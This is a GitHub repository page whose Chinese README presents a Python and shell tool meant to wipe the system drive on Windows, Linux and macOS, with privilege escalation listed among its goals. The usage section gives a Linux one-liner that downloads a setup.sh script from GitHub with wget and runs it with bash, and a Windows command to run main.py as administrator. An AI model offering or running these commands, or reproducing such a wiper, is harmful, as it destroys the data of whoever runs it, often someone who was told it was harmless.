Skip to content

SDCOM-0415/del-your-system

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Delete Your System!

你想要快速的删除你系统盘的资料吗? 好的,那就跟我来吧!

程序简介

一个基于Pythonpython的一个小项目

是我突发奇想然后闲的没逝写的一个python小程序

总之,它很危险,因为那是会把你系统盘清空的一个小程序(Linux会把所有东西都清除掉)

所以有重要资料的同学慎用,运行之前记得备份

gitcode镜像:https://gitcode.com/SDCOM-0415/del-your-system

程序实现目标

  • 可执行二进制程序
  • 跨平台可用 ( Windows Linux macOS )
  • 针对于 Linux or macOS 操作系统的提权
  • 针对于 Windows 系统的提权
  • 针对于Linux的Shell脚本
  • 多系统整合为同一Python脚本
  • 优化系统读取方案
  • 适用于Windows的batch脚本
  • 适用于macOS的shell(command)脚本

使用方法

  1. 安装python的任意版本
  2. 根据你的操作系统来选择下载
  3. 使用python运行
# Windows (使用管理员身份运行)
python main.py
# Linux
wget https://raw.githubusercontent.com/SDCOM-0415/del-your-system/refs/heads/main/Linux%20%26%26%20macOS/setup.sh && bash ./setup.sh

版本更新日志

v0.3

  1. 更新Linux shell脚本
  2. gitcode镜像:https://gitcode.com/SDCOM-0415/del-your-system

v0.2

实现命令的成功执行以及读取操作系统

v0.1

启动项目,实现最基本的读取操作系统和读取用户执行身份

About

基于python的删除你的系统

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published